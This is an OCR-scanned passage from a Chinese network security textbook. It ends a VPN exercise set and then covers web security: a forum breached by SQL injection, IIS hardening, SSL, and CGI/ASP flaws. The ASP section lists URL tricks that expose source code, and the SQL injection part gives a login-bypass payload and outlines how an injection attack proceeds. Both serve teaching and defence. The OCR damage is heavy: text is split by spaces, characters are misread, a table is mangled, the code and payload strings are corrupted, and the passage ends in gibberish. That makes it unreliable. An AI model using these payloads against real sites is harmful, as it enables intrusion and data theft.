C. 只 使 用 TCP 作为 传输 层 协议 D. 将 网 络 层 改造 为 有 逻辑 连接 的 层 
6. 为 了 避免 第 三 方 偷 看 WWW 浏览 器 与 服务 器 交互 的 敏感 信息 ,通常 需要 


A. 采用 SSL 技术 B. 在 浏览 器 中 加 载 数字 证 书 
C. 采用 数字 签名 技术 D. 将 服务 器 放 入 可 信 站 点 区 
二 、 填空 题 
1. VPN 是 实现 在 网 络 上 构建 的 虚拟 专用 网 。 
2 指 的 是 利用 一 种 网 络 协议 传输 另 一 种 网 络 协议 ,也 就 是 对 原始 网 络 信息 进行 
再 次 封装 ,并 在 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 .从 而 保证 网 络 信息 传输 的 安全 性 。 
3. AH 协议 提供 了 和 功能 ,但 是 没有 提供 功能 。 
4. ESP 协议 提供 了 : 和 功能 。 
5. 在 SSL 之 上 使 用 的 HTTP 被 称 为 ,其 端口 号 为 
三 、 简 答题 
1. 什么 是 VPN? 它 有 何 特点 ? 
2. 简 述 VPN 的 处 理 过 程 。 
3. VPN 可 分 为 哪 3 种 类 型 ? 
4. VPN 的 关键 技术 包括 哪些 ? 
5. 什么 是 隧道 技术 ? 
6. IPSec VPN 与 SSL VPN 有 何 区 别 ? 
四 、 操作 练习 题 


建立 一 个 VPN 连接 到 单位 内 部 网 ,用 户 名 为 test, 密 码 为 test。 
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101 项 目 提 出 


张 先生 开办 的 公司 越 来 越 大 ,公司 人 员 也 越 来 越 多 ,为 了 便于 通信 和 交流 , 张 先生 在 公 
司 网 络 内 部 开通 了 论坛 ,论坛 中 只 管理 员 才 有 管理 权限 ,普通 员工 只 能 查看 和 发 表 论坛 
信息 。 

有 一 天 ,公司 员工 反映 网 络 论坛 被 恶意 更 改 , 公 司 内 部 一 片 哗然 , 张 先生 马上 召集 网 络 
管理 员 ,询问 事件 的 缘由 。 经 初步 调查 分 析 ,在 公司 的 防火 墙 和 入 侵 检 测 系统 上 均 未 发 现 人 
侵 的 痕迹 ,也 未 发 出 安全 警报 ,那么 网 络 论坛 究 竟 是 怎么 被 黑 掉 的 呢 ? 


102 项 目 分 析 


网 络 管理 员 小 李 再 次 认真 分 析 了 网 络 论坛 系统 ,发 现 论坛 系统 采用 了 ASP 十 Access 的 
编程 环境 ,从 IIS 的 日 志 中 发 现 ,黑客 是 用 正常 的 管理 员 账 户 和 密码 登录 论坛 系统 的 ,那么 
黑客 是 怎么 知道 管理 员 账 户 和 密码 的 呢 ? 

小 李 对 论坛 系统 的 管理 员 登 录 模 块 进行 了 仔细 分 析 ,发现 登录 模块 没有 对 攻击 者 输入 
的 管理 员 账 户 和 密码 等 数据 进行 合法 性 检查 ,而且 存在 SQL 注入 漏洞 ,使 得 攻击 者 通过 输 
人 一 些 特殊 字符 就 能 成 功 登录 论坛 系统 ,或 利用 SQL 注入 工具 破解 管理 员 账 户 和 密码 。 

找到 原因 后 ,小 李 设 置 了 输入 数据 的 合法 性 检查 .并 修复 了 SQL 注入 漏洞 .对 Web 服 
务 器 进一步 加 强 了 安全 配置 ,并 采用 了 SSL 安全 协议 。 公 司 的 论坛 系统 又 恢复 了 正常 ,此 
后 论坛 系统 再 也 没有 发 生 过 类 似 的 安全 事件 。 


103 相关 知识 点 


10.3.1 Web 安全 概述 


随 着 Web 2.0、 社 交 网 络 、 微 博 等 一 系列 新 型 的 互联 网 产品 的 诞生 .基于 Web 环境 的 互 
联网 应 用 越 来 越 广泛 .企业 信息 化 的 过 程 中 各 种 应 用 都 架设 在 Web 平台 上 ,Web 业务 的 迅 
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速 发 展 也 引起 黑客 们 的 强烈 关注 , 接 是 而 至 的 就 是 Web 安全 威胁 的 凸显 .黑客 利用 网 站 操 
作 系 统 的 漏洞 和 Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 , 轻 则 算 改 
网 页 内 容 , 重 则 窃取 重要 内 部 数据 .更 为 严重 的 则 是 在 网 页 中 植 信 恶意 代码 ,使 得 网 站 访问 
者 受到 侵害 。 这 也 使 得 越 来 越 多 的 用 户 关注 应 用 层 的 安全 问题 ,对 Web 应 用 安全 的 关注 度 
也 逐渐 升温 。 

目前 ,很 多 业务 都 依赖 于 互联 网 ,例如 说 网 上 银行 .网络 购 物 、 网 络 游戏 等 ,很 多 恶意 攻 
击 者 出 于 不 良 的 目的 对 Web 服务 器 进行 攻击 ,想方设法 通过 各 种 手段 获取 他 人 的 个 人 账户 
信息 谋取 利益 。 正 是 因为 这 样 ,.Web 业务 平台 最 容易 遭受 攻击 。 同 时 ,对 Web 服务 器 的 攻 
击 也 可 以 说 是 形形色色 ,种 类 繁多 ,常见 的 有 挂 马 、SQL 注入 、 缓 冲 区 溢出 . 嗅 探 ,利用 IIS 等 
针对 Web 服务 器 漏洞 进行 攻击 。 

一 方面 ,由 于 TCP/IP 的 设计 是 没有 考虑 安全 问题 的 ,这 使 得 在 网 络 上 传输 的 数据 是 没 
有 任何 安全 防护 的 。 攻 击 者 可 以 利用 系统 漏洞 造成 系统 进程 缓冲 区 溢出 ,攻击 者 可 能 获得 
或 者 提升 自己 在 有 漏洞 的 系统 上 的 用 户 权限 来 运行 任意 程序 ,甚至 安装 和 和 运行 恶意 代码 , 窃 
取 机 密 数据 。 而 应 用 层面 的 软件 在 开发 过 程 中 也 没有 过 多 考虑 到 安全 的 问题 ,这 使 得 程序 
本 身 存在 很 多 漏洞 ,诸如 绥 冲 区 溢出 、SQL 注入 等 流行 的 应 用 层 攻击 ,这些 均 属 于 在 软件 研 
发 过 程 中 疏 忽 了 对 安全 的 考虑 所 致 。 

另 一 方面 ,用 户 对 某 些 隐秘 的 东西 带 有 强烈 的 好 奇 心 ,一 些 利用 木马 或 病毒 程序 进行 攻 
击 的 攻击 者 ,往往 就 利用 了 用 户 的 这 种 好 奇 心 理 , 将 木马 或 病毒 程序 拥 绑 在 一 些 艳 丽 的 图 
片 . 音 视频 及 免费 软件 等 文件 中 ,然后 把 这 些 文件 置 于 某 些 网 站 当中 ,再 引诱 用 户 去 单 击 或 
下 载运 行 。 或 者 通过 电子 邮件 附件 和 QQ MSN 等 即时 聊天 软件 ,将 这 些 拥 绑 了 木马 或 病 
毒 的 文件 发 送 给 用 户 ,利用 用 户 的 好 奇 心理 引诱 用 户 打开 或 运行 这 些 文件 。 

Web 站 点 的 安全 问题 主要 表现 在 以 下 几 个 方面 。 

(1) 未 经 授权 的 存 取 操作 。 由 于 操作 系统 等 方面 的 漏洞 .使 未 经 授权 的 用 户 可 以 获得 
Web 服务 器 上 的 秘密 文件 和 数据 ,甚至 可 以 对 Web 服务 器 上 的 数据 进行 修改 、 删 除 ,这 是 
Web 站 点 的 一 个 严重 的 安全 问题 。 

(2) 窃取 系统 的 信息 。 非 法 用 户 侵入 系统 内 部 ,获取 系统 的 一 些 重要 信息 ,如 用 户 名 、 
用 户口 令 ,加密 密 钥 等 ,利用 窃取 的 这 些 信息 ,达到 进一步 攻击 系统 的 目的 。 

(3) 破坏 系统 。 对 网 络 系统 、 操 作 系统 应 用 程序 等 进行 破坏 。 

(4) 非法 使 用 。 用 户 对 未 经 授权 的 程序 、 命 令 进行 非法 使 用 ,使 他 们 能 够 修改 或 破坏 
系统 。 

(5) 病毒 破坏 。 目 前 , Web 站 点 面临 着 各 种 各 样 病毒 的 威胁 。 蠕 虫 .特洛伊 木马 .电子 
邮件 炸弹 、 逻 辑 炸弹 等 多 种 计算 机 病毒 严重 威胁 着 Web 站 点 的 安全 。 


10.3.2 IIS 的 安全 


目前 ,Web 服务 器 软件 有 很 多 ,其 中 IIS(CInternet Information Server, Internet 信息 服 
务 ) 以 其 和 Windows 系统 的 完美 结合 ,得 到 了 广泛 的 应 用 。IIS 作为 一 种 开放 的 服务 ,其 发 
布 的 文件 和 数据 是 无 须 进 行 保护 的 ,但 是 ,IIS 作为 Windows 操作 系统 的 一 部 分 , 却 可 能 由 
于 自身 的 安全 漏洞 导致 整个 Windows 操作 系统 被 攻陷 。 日 前 ,很 多 黑客 正 是 利用 IIS 的 安 
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全 漏洞 成 功 实 现 了 对 Windows 操作 系统 的 攻击 ,获取 了 特权 用 户 权 限 和 敏感 数据 ,因此 加 
强 TS 的 安全 是 必要 的 。 


1. JIS 安装 安全 


IIS 作为 Windows 的 一 个 组 件 ,可 以 在 安装 Windows 系统 的 时 候选 择 是 否 安装 。 安 装 
Windows 系统 之 后 ,也 可 以 通过 控制 面板 中 的 “添加 /删除 程序 ”来 添加 /删除 IS 组 件 。 

在 安装 IIS 之 后 ,在 安装 的 计算 机 上 将 默认 生成 IUSR_Computername 的 匿名 账户 (其 
中 Computername 为 计算 机 的 名 称 ) ,该 账户 被 添加 到 域 用 户 组 中 ,从 而 把 应 用 于 域 用 户 组 
的 访问 权限 提供 给 访问 IIS 服务 器 的 每 个 匿名 用 户 , 这 不 仅 给 IIS 带 来 了 很 大 的 安全 隐患 ， 
还 可 能 威胁 到 整个 域 资源 的 安全 。 因 此 ,要 尽量 避免 把 IIS 安装 到 域 控 制 器 上 。 

同时 ,在 安装 IS 的 Web、FTP 等 服务 时 .应 尽量 避免 将 IIS 服务 器 安装 在 系统 分 区 上 。 
把 IIS 服务 器 安装 在 系统 分 区 上 ,会 使 系统 文件 和 IIS 服务 器 文件 同样 面临 非法 访问 ,容易 
使 非法 用 户 和 人 侵 系统 分 区 。 

另外 ,避免 将 IIS 服务 器 安装 在 非 NTFS 分 区 上 。 相 对 于 FAT、FAT32 分 区 而 言 ， 
NTFS 分 区 拥有 较 高 的 安全 性 和 磁盘 利用 率 , 可 以 设置 复杂 的 访问 权限 ,以 适应 不 同 信息 服 
务 的 需要 。 


2. 用 户 控制 安全 


由 IIS 搭建 的 Web 网 站 ,默认 允许 所 有 用 户 匿名 访问 ,网 络 中 的 用 户 无 须 输 入 用 户 名 
和 密码 就 可 以 任意 访问 Web 页 面 。 而 对 于 一 些 安全 性 要 求 较 高 的 Web 网 站 ,或 者 Web 网 
站 中 拥有 敏感 数据 时 ,也 可 以 采用 多 种 用 户 认证 方式 ,对 用 户 进行 身份 验证 ,从 而 确保 只 有 
经 过 授权 的 用 户 才能 实现 对 Web 信息 的 访问 和 浏览 。 

(1) 禁止 匿名 访问 。 安 装 IIS 后 默认 生成 的 IUSR_Computername 匿名 账户 给 Web 服 
务 器 带 来 了 很 大 的 安全 隐患 ,Web 客户 可 以 使 用 该 匿名 账户 自动 登录 ,应 该 对 其 访问 权限 
进行 限制 。 一 般 情况 下 ,如果 没有 匿名 访问 需求 .可 以 取消 Web 的 匿名 访问 。 

(2) 使 用 用 户 身 份 验 证 。 在 IIS 6.0 中 ,除了 匿名 访问 外 ,提供 了 集成 Windows 身份 验 
证 .Windows 域 服务 器 的 摘要 式 身 份 验 证 、 基 本 身份 验证 和 . NET Passport 身份 验证 等 多 
种 身份 验证 方式 。 

Q@ 基本 身份 验证 。 这 种 身份 验证 方式 是 标识 用 户 身份 的 广 为 使 用 的 行业 标准 方法 。 
Web 服务 器 在 下 面 两 种 情况 下 使 用 基本 身份 验证 :禁用 匿名 访问 ;由 于 已 经 设置 了 
Windows 权限 ,因此 拒绝 匿名 访问 ,并 且 在 建立 与 受 限 内 容 的 连接 之 前 要 求 用 户 提 供 
Windows 用 户 名 和 密码 。 在 基本 身份 验证 过 程 中 ,用 户 的 Web 浏览 器 将 提示 用 户 输入 有 
效 的 Windows 账户 和 密码 。 在 此 方式 中 ,用 户 输入 的 账户 和 密码 是 以 明文 方式 在 网 络 上 传 
输 的 ,没有 任何 加 密 。 如 果 在 传输 过 程 中 被 非法 用 户 截 取 数 据 包 ,就 可 以 从 中 获取 账户 名 和 
密码 ,因此 它 是 一 种 安全 性 很 低 的 身份 验证 方式 ,适合 于 给 需要 很 少 保密 性 的 信息 授予 访问 
权限 。 

@ 集成 Windows 身份 验证 。 集 成 Windows 身份 验证 是 一 种 安全 的 验证 形式 。 需 要 
用 户 输入 用 户 名 和 密码 .但 用 户 名 和 密码 在 通过 网 络 发 送 前 会 经 过 散 列 函数 (Hash 函数 ) 
的 处 理 ,因此 可 以 确保 安全 性 。 当 启用 Windows 身份 验证 时 .用 户 的 浏览 器 通过 与 Web 服 
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务 器 进行 密码 交换 (包括 散 列 值 ) 来 证 明 其 知道 密码 。 集 成 Windows 身份 验证 是 Windows 
Server 2003 家 族 成 员 中 使 用 的 默认 身份 验证 方式 ,安全 性 较 高 。 

集成 Windows 身份 验证 使 用 Kerberos v5 验证 和 NTLM 验证 。 如 果 在 Windows 2000 
或 更 高 版 本 的 域 控制 器 上 安装 了 Active Directory 服务 ,并 且 用 户 的 浏览 器 支持 Kerberos 
v5 验证 协议 , 则 使 用 Kerberos v5 验证 ,否则 使 用 NTLM 验证 。 

与 基本 身份 验证 方式 不 同 , 集 成 Windows 身份 验证 开始 时 并 不 提示 用 户 输 入 用 户 名 和 
密码 。 客 户 机 上 的 当前 Windows 身份 信息 可 用 于 集成 Windows 身份 验证 。 只 有 当 开 始 时 
的 验证 失败 后 ,浏览 器 才 提 示 用 户 输入 用 户 名 和 密码 ,并 使 用 集成 Windows 身份 验证 进行 
处 理 。 如 果 还 不 成 功 ,浏览 器 将 继续 提示 用 户 , 直 到 用 户 输入 有 效 的 用 户 名 和 密码 或 关闭 提 
示 对 话 框 为 止 。 

@ Windows 域 服务 器 的 摘要 式 身份 验证 。 摘 要 式 身 份 验证 提供 了 和 基本 身份 验证 相 
同 的 功能 ,但 是 ,摘要 式 身 份 验证 在 通过 网 络 发 送 用 户 凭据 方面 提高 了 安全 性 ,在 发 送 用 户 
凭据 前 经 过 了 哈 希 计算 。 摘 要 式 身份 验证 只 能 在 带 有 Windows 2000/2003 域 控制 器 的 域 
中 使 用 。 

各 种 身份 验证 方式 的 比较 如 表 10-1 所 示 。 

表 10-1 各 种 身份 验证 方式 的 比较 


是 否 可 以 跨 过 代 

身份 验证 方式 ”| 安全 性 如 何 发 送 密码 二 民 攻 二 有 内 天 计 客户 端 要 求 
匿名 身份 验证 无 无 是 任何 浏览 器 
基本 身份 验证 低 明文 是 大 多 数 浏览 器 
摘要 式 身份 验证 中 哈 希 计算 是 IE 5 及 以 上 版 本 
集成 Windows 哈 希 计算 或 否 ,除非 在 PPTP 

b 

身份 验证 a Kerberos 票据 连接 上 使 用 A 


在 实际 应 用 中 .可 以 根据 不 同 的 安全 性 需要 设置 不 同 的 用 户 认证 方式 。 
3. 访问 权限 控制 


(1) NTFS 文件 系统 的 文件 和 文件 夹 的 访问 权限 控制 

如 果 将 Web 服务 器 安装 在 NTFS 分 区 上 ,一 方面 可 以 对 NTFS 文件 系统 的 文件 和 文 
件 夹 的 访问 权限 进行 控制 ,对 不 同 的 用 户 组 和 用 户 授予 不 同 的 访问 权限 。 另 外 ,还 可 以 利用 
NTFS 文件 系统 的 审核 功能 ,对 某 些 特定 用 户 组 成 员 读 写 文件 的 企图 等 方面 进行 审核 ,有 效 
地 通过 监视 如 文件 访问 .用 户 对 象 的 使 用 等 发 现 非法 用 户 进 行 非法 活动 的 前 兆 , 以 及 时 加 以 
预防 制止 。 

(2) Web 日 录 的 访问 权限 控制 

对 于 已 经 设置 成 Web 日 录 的 文件 夹 .可 以 通过 操作 Web 站 点 属性 页 实现 对 Web 目录 
访问 权限 的 控制 ,而 该 日 录 下 的 所 有 文件 和 文件 夹 都 将 继承 这 些 安全 性 设置 。 

下 面 是 几 种 Web 目录 访问 权限 的 含义 。 

@ 脚本 资源 访问 。 在 设置 了 读 取 或 写 入 权限 的 情况 下 ,选中 该 权限 则 允许 用 户 访问 源 
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代码 (如 ASP 程序 ) ,这 可 能 使 其 他 人 利用 ASP 脚本 漏洞 对 Web 网 站 发 起 恶意 攻击 ,因此 
一 般 不 要 选中 该 权限 。 

@ 读 取 。 人 允许 用 户 读 取 或 者 下 载 文件 .目录 及 其 相关 属性 。 要 发 布 信息 时 必须 将 其 
选中 。 

@ 写 人 。 人 允许 用 户 上 传 文件 到 Web 服务 器 上 已 启用 的 目录 中 ,或 更 改 可 写 文件 的 内 
容 。 如 果 仅 仅 是 发 布 信息 ,不 要 选中 该 权限 。 当 允许 用 户 “ 写 入 ”时 ,要 选择 相应 的 身份 验证 
方式 ,并 设置 磁盘 配额 ,以 防止 非法 用 户 的 入 侵 , 以 及 授权 用 户 对 磁盘 空间 的 无 限制 滥用 。 

@ 日 录 浏 览 。 允 许 用 户 看 到 该 日 录 下 的 文件 和 子 日 录 的 超 文本 列表 。 除 非 必要 ,一 般 
不 要 选中 该 权限 ,因为 通过 该 权限 可 以 显示 Web 网 站 的 日 录 结 构 , 从 而 判断 出 Web 数据 库 
和 应 用 程序 的 位 置 , 进 而 对 网 站 发 起 恶意 攻击 。 

回 记录 访问 。 人 允许 用 户 将 IIS 配置 成 在 日 志文 件 中 记录 对 该 目录 的 访问 情况 ,通过 该 
日 志文 件 , 可 以 对 网 站 的 访问 进行 统计 和 分 析 , 有 利于 系统 安全 。 

@@ 索引 资源 。 人 允许 Microsoft Indexing Service 将 该 目录 包含 在 Web 网 站 的 全 文 索 


引 中 。 
4. IP 地 址 控制 


如 果 使 用 前 面 介绍 的 用 户 身 份 验 证 方式 ,每 次 访问 站 点 时 都 需要 输入 用 户 名 和 密码 ,对 
于 授权 用 户 而 言 比较 麻烦 。IIS 可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 选择 地 
允许 特定 节点 的 用 户 访问 Web 服务 ,可 以 通过 设置 来 阻止 除了 特定 IP 地 址 外 的 整个 网 络 
用 户 来 访问 Web 服务 器 。 因 此 ,通过 IP 地 址 来 进行 用 户 控制 是 一 个 非常 有 效 的 方法 。 


5. 端口 安全 


对 于 IIS 服务 ,无论 是 Web 站 点 FTP 站 点 还 是 SMTP 服务 .都 有 各 自 的 TCP 端口 号 
用 来 监听 和 接收 用 户 浏览 器 发 出 的 请 求 ,一 般 的 默认 端口 号 为 :Web 站 点 是 80,FTP 站 点 
是 21,SMTP 服务 是 25。 可 以 通过 修改 默认 TCP 端口 号 来 提高 IIS 服务 器 的 安全 性 ,因为 
如 果 修 改 了 默认 端口 号 .就 只 有 知道 端口 号 的 用 户 才能 访问 IIS 服务 器 。 


6. SSL 安全 


SSL(Security Socket Layer ,安全套 接 层 ) 是 Netscape 公司 为 了 保证 Web 通信 的 安全 
而 提出 的 一 种 网 络 安全 通信 协议 。SSL 协议 采用 了 对 称 加 密 技术 和 公 钥 加 密 技术 ,并 使 用 
了 X. 509 数字 证 书 技术 .实现 了 Web 客户 端 和 服务 器 端 之 间 数 据 通信 的 保密 性 、 完 整 性 和 
用 户 认 证 。 

SSL 的 工作 原理 是 :使 用 SSL 安全 机 制 时 ,首先 在 客户 端 和 服务 器 之 间 建 立 连接 ,服务 
器 将 数字 证 书 连同 公开 密 钥 一 起 发 给 客户 端 。 在 客户 端 ,随机 生成 会 话 密 钥 ,然后 使 用 从 服 
务 器 得 到 的 公开 密 钥 加 密会 话 密 钥 .并 把 加 密 后 的 会 话 密 钥 在 网 络 上 传送 给 服务 器 。 服 务 
器 使 用 相应 的 私 钥 对 接收 的 加 密 了 的 会 话 密 钥 进行 解密 ,得 到 会 话 密 钥 , 之 后 ,客户 端 和 服 
务 器 端 就 可 以 通过 会 话 密 钥 加 密 通 信 的 数据 了 。 这 样 客户 端 和 服务 器 端 就 建立 了 一 个 唯一 
的 安全 通信 通道 。 

SSL 安全 协议 提供 的 安全 通信 有 以 下 3 个 特征 。 
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@ 数据 保密 性 。 在 客户 端 和 服务 器 端 进行 数据 交换 之 前 ,交换 SSL 初始 握手 信息 ,在 
SSL 握手 过 程 中 采用 了 各 种 加 密 技术 对 其 进行 加 密 , 以 保证 其 机 密 性 和 数据 完整 性 ,并 且 
用 数字 证 书 进行 鉴别 。 这 样 就 可 以 防止 非法 用 户 进行 破译 。 在 初始 化 握手 协议 对 加 密 密 钥 
进行 协商 之 后 ,传输 的 信息 都 是 经 过 加 密 的 数据 。 加 密 算法 为 对 称 加 密 算法 ,如 DES、 
IDEA、RC4 等 。 

@ 数据 完整 性 。 通 过 MD5 、SHA 等 Hash 函数 来 产生 消息 摘要 ,所 传输 的 数据 都 包含 
数字 签名 ,以 保证 数据 的 完整 性 和 连接 的 可 靠 性 。 

@ 用 户 身份 认证 。SSL 要 分 别 认证 客户 机 和 服务 器 的 合法 性 ,使 之 能 够 确信 数据 将 被 
发 送 到 正确 的 客户 机 和 服务 器 上 。 通 信 双 方 的 身份 通过 公 钥 加 密 算法 (如 RSA、DSS 等 ) 实 
施 数字 签名 来 验证 ,以 防 假冒 。 

通过 IIS 在 Web 服务 器 上 配置 SSL 安全 功能 ,可 以 实现 Web 客户 端 和 服务 器 端的 安 
全 通信 (以 https:// 开 头 的 URL) ,避免 数据 被 中 途 截获 和 篡改 。 对 于 安全 性 要 求 很 高 .可 
交互 性 的 Web 网 站 ,建议 采用 SSL 进行 传输 。 


10.3.3 ”脚本 语言 的 安全 


1. CGI 的 安全 性 


CGI(Common Gateway Interface, 公 用 网 关 接 口 ) 是 Web 服务 器 和 外 部 应 用 程序 之 间 交 换 
数据 的 标准 接口 ,提供 了 一 种 方便 、 灵 活 的 机 制 , 用 以 扩展 简单 的 建立 在 HTTP 服务 器 上 的 
“获得 文本 并 显示 ”的 功能 ,使 Web 上 的 资源 可 以 随 着 用 户 输入 的 变化 而 变化 ,可 以 通过 用 户 
的 Web 浏览 器 收集 用 户 的 输入 ,发 送 给 Web 服务 器 ,并 且 将 这 些 信息 传 给 外 部 程序 。 同 时 ,又 
将 外 部 程序 的 输出 作为 Web 服务 器 对 发 送信 息 的 Web 浏览 器 的 响应 ,发 送 给 用 户 。CGI 脚本 
使 用 户 能 和 浏览 器 交互 ,使 Web 页 面 从 传统 的 静态 页 面 变 成 了 动态 的 页 面 。 

如 果 CGI 程序 在 设计 的 过 程 中 考虑 不 周 , 而 Web 管理 员 在 将 其 放 到 Web 服务 器 之 前 
并 没有 进行 严格 的 安全 测试 ,CGI 程序 可 能 会 给 黑客 们 以 可 乘 之 机 。CGI 程序 可 能 以 下 面 
两 种 方式 产生 安全 漏洞 。 

(1) CGI 程序 可 能 有 意 或 无 意 地 泄漏 主机 系统 的 一 些 信息 ,这 些 系统 信息 将 有 助 于 黑 
客 对 系统 进行 攻击 。 

(2) CGI 程序 在 处 理 远程 用 户 输入 时 ,如 一 个 表单 的 内 容 或 者 一 个 可 搜索 的 索引 命令 ， 
容易 受到 远程 用 户 的 攻击 ,用 户 可 以 骗取 在 系统 上 执行 命令 的 权限 。 

一 个 被 攻破 的 CGI 程序 仍 有 足够 的 权限 将 系统 中 的 密码 等 重要 信息 以 电子 邮件 的 方 
式 发 送 给 入 侵 者 , 读 取 网 络 信息 映射 数据 库 的 内 容 , 或 在 更 高 的 端口 上 启动 登录 会 话 ,而 要 
完成 这 些 功 能 ,只 需要 在 Perl 程序 中 执行 几 个 简单 的 命令 即 可 。 


2. ASP 的 安全 性 


ASP(Active Server Page, 动 态 服务 器 页 面 ) 是 Microsoft 公司 开发 的 服务 端 脚本 编写 
环境 ,可 以 创建 和 和 运行 动态 的 .交互 的 Web 服务 器 应 用 程序 。 由 于 ASP 应 用 程序 比 一 般 的 
CGI 程序 更 容易 开发 和 修改 ,因此 ,目前 很 多 基于 Windows 的 服务 器 都 使 用 ASP 作为 交互 
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程序 开发 环境 ,通常 是 和 Microsoft 的 TIS Web 服务 器 软件 一 同 使 用 的 。 但 是 ,从 早期 运行 
在 IIS 3.0 上 的 ASP 到 现在 运行 在 IIS 6.0 上 的 ASP, 都 无 一 不 存在 着 安全 漏洞 。 

(1) ASP 源 代 码 的 漏洞 。 在 某 些 版 本 的 IS 上 ,如 果 按 照 如 下 的 几 中 URL 格式 输入 ， 
在 浏览 器 中 就 会 显示 相应 的 ASP 源 代码 。 

http://www. somehost. com/some. asp: : $ DATA 

http://www. somehost. com/some. asp. 

http://www. somehost. com/ some. asp&2e 

http://www. somehost. com/some % 2e % 41sp 

http://www. somehost. com/some % 2e % asp 

http://www. somehost. com/ some.asps%81 或 者 82 

http://www. somehost. com/ some. aspe9 或 者 e8 

上 述 几 种 格式 的 URL 输入 都 可 能 引起 ASP 源 代 码 的 安全 漏洞 。 因 为 有 些 源 代码 可 能 
包含 用 户 密码 或 数据 库 等 敏感 信息 ,即使 没有 暴露 这 些 信 息 .黑客 也 能 借 机 分 析 程 序 迎 辑 中 
的 脆弱 点 ,还 可 以 轻易 地 将 源 程序 取 走 。 

解决 上 述 安全 问题 的 最 好 方法 是 安装 最 新 版 本 的 Service Pack 和 相关 补丁 。 

(2) 密码 验证 时 的 漏洞 。 有 些 ASP 程序 员 编写 程序 的 时 候 喜 欢 把 密码 放 在 数据 库 中 ， 
在 用 户 登录 验证 时 ,采用 如 下 的 SQL 语句 进行 密码 验证 。 

sql=" select * from table where username = '" &user id&""andpasswd = '"&user pxd&"'" 

此 SQL 语句 是 ASP 程序 if 语句 的 一 部 分 ,如 果 该 语句 返回 真 , 则 用 户 名 和 密码 验证 
通过 。 

若 在 用 户 名 输入 框 中 输入 admin, 在 密码 输入 框 中 输入 letmein, 则 最 后 构造 生成 的 
SQL 查询 语句 为 : 

select * from table where username = ‘admin' and passwd = "letmein' 


如 果 攻 击 者 在 用 户 名 输入 框 中 输入 admin, 在 密码 输入 框 中 输入 anything'"or'1' 王 ， 
1, 则 最 后 构造 生成 的 SQL 查询 语句 为 : 


select * from table where username = "admin' and passwd = "anything' or '1" = "11 


由 于 "1' 一"1' 恒 为 真 , 加 上 或 (or) 逻 辑 的 运算 作用 ,该 条 件 恒 为 真 , 用 户 身份 得 到 验证 
通过 ,可 成 功 进 入 后 台 系统 ,系统 安全 被 攻破 。 

解决 的 方法 是 对 用 户 的 输入 进行 合法 性 检查 ,如 先 过 滤 掉 非法 字符 ”" ”, 或 者 逐个 字段 
进行 比较 。 

(3) 来 自 filesystemobject 的 威胁 

IIS 4.0 的 ASP 的 文件 操作 可 以 通过 filesystemobject 来 实现 .包括 文本 文件 的 读 写 , 晶 
录 操 作 , 文 件 的 复制 改名、 删除 等 .这 给 编程 人 员 带 来 方便 的 同时 ,也 给 黑客 留 下 了 可 乘 之 
机 。 利 用 filesystemobject 可 以 算 改 并 下 载 FAT 以 及 FAT32 分 区 上 的 任何 文件 ,即使 是 
NTFS 分 区 ,如果 权 限 没 有 设置 好 ,同样 也 能 遭 到 破坏 ,遗憾 的 是 很 多 Web 服务 器 管理 员 只 
知道 让 Web 服务 器 运行 起 来 ,很 少 对 NTFS 分 区 进行 权限 设置 。 


3. SQL 注入 


随 着 B/S 模式 应 用 开发 的 发 展 .使 用 这 种 模式 编写 应 用 程序 的 程序 员 越 来 越 多 。 但 是 
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由 于 这 个 行业 的 入 门 门槛 不 高 .程序 员 的 水 平 及 经 验 也 参差 不 齐 , 相 当 大 的 一 部 分 程序 员 在 
编写 代码 时 ,没有 对 用 户 输 入 的 数据 进行 合法 性 检查 ,导致 应 用 程序 存在 安全 隐患 。 用 户 可 
以 提交 一 段 数据 库 查 询 代 码 ,根据 程序 返回 的 结果 ,获得 某 些 想 得 知 的 数据 ,这 就 是 所 谓 的 
SQL Injection, 即 SQL 注入 。 

SQL 注入 攻击 的 危害 性 较 大 ,注入 攻击 成 功 后 ,网 站 后 台 管 理 账 户 名 和 密码 可 被 攻击 
者 所 获取 ,之 后 利用 该 账户 登录 后 台 管 理 系 统 ,从 而 导致 攻击 者 可 任意 算 改 网 站 数据 或 导致 
数据 的 严重 泄密 。 因 此 ,在 一 定 程度 上 ,其 安全 风险 高 于 其 他 漏洞 。 目 前 ,SQL 注入 攻击 已 
成 为 对 网 站 攻击 的 主要 手段 之 一 。 

SQL 注入 是 从 正常 的 WWW 端口 (通常 是 HTTP 的 80 端口 ) 访 问 ,表面 看 起 来 跟 一 般 
的 Web 页 面 访问 没有 什么 区 别 , 所 以 目前 一 般 的 防火 墙 都 不 会 对 SQL 注入 发 出 警报 或 进 
行 拦截 。SQL 注入 攻击 具有 一 定 的 隐蔽 性 ,如 果 注 入 攻击 成 功 后 ,攻击 者 并 不 着 急 破坏 或 
修改 网 站 数据 ,管理 员 又 没有 查看 IIS 日 志 的 习惯 , 则 可 能 被 入 侵 很 长 时 间 了 都 不 会 发 觉 。 

据 统计 ,日 前 国内 的 网 站 使 用 ASP 十 Access( 或 SQL Server) 的 占 70% 以 上 ,PHP 十 
MySQL 占 20% 左 右 , 其 他 的 不 足 10%。 由 此 可 见 , 使 用 ASP 作为 Web 服务 器 应 用 程序 的 
比例 很 高 ,因此 通常 把 通过 ASP 来 实现 的 SQL 注入 也 称 为 ASP 注入 。 

实现 SQL 注入 的 基本 思路 是 :首先 ,判断 环境 ,寻找 注入 点 ,判断 网 站 后 台数 据 库 
类 型 ;其 次 ,根据 注入 参数 类 型 ,在 脑海 中 重 构 SQL 语句 的 原貌 ,从 而 猜测 数据 库 中 的 
表 名 和 列 名 (字段 名 ) ;最 后 ， 在 表 名 和 列 名 猜 解 成 功 后 ， 再 使 用 SQL 语句 ,得 出 字段 的 
值 。 当 然 ,这 里 可 能 需要 一 些 运气 的 成 分 。 如 果 能 获得 管理 员 的 账户 名 和 密码 ,就 可 
以 实现 对 网 站 的 管理 。 

为 了 提高 注入 效率 ,目前 网 络 上 已 经 有 很 多 ASP 页 面 注入 的 工具 可 以 使 用 。 


10.3.4 Web 浏览 器 的 安全 


在 Internet 上 ,Web 浏览 器 安全 级 别 高 低 的 区 分 是 以 用 户 通过 浏览 器 发 送 数据 和 浏览 
访问 本 地 客户 资源 的 能 力 高 低 来 区 分 的 。 安 Eee 
全 和 灵活 是 一 对 矛盾 ,高 的 安全 级 别 必然 带 来 ne jnw [i [er IGCC 
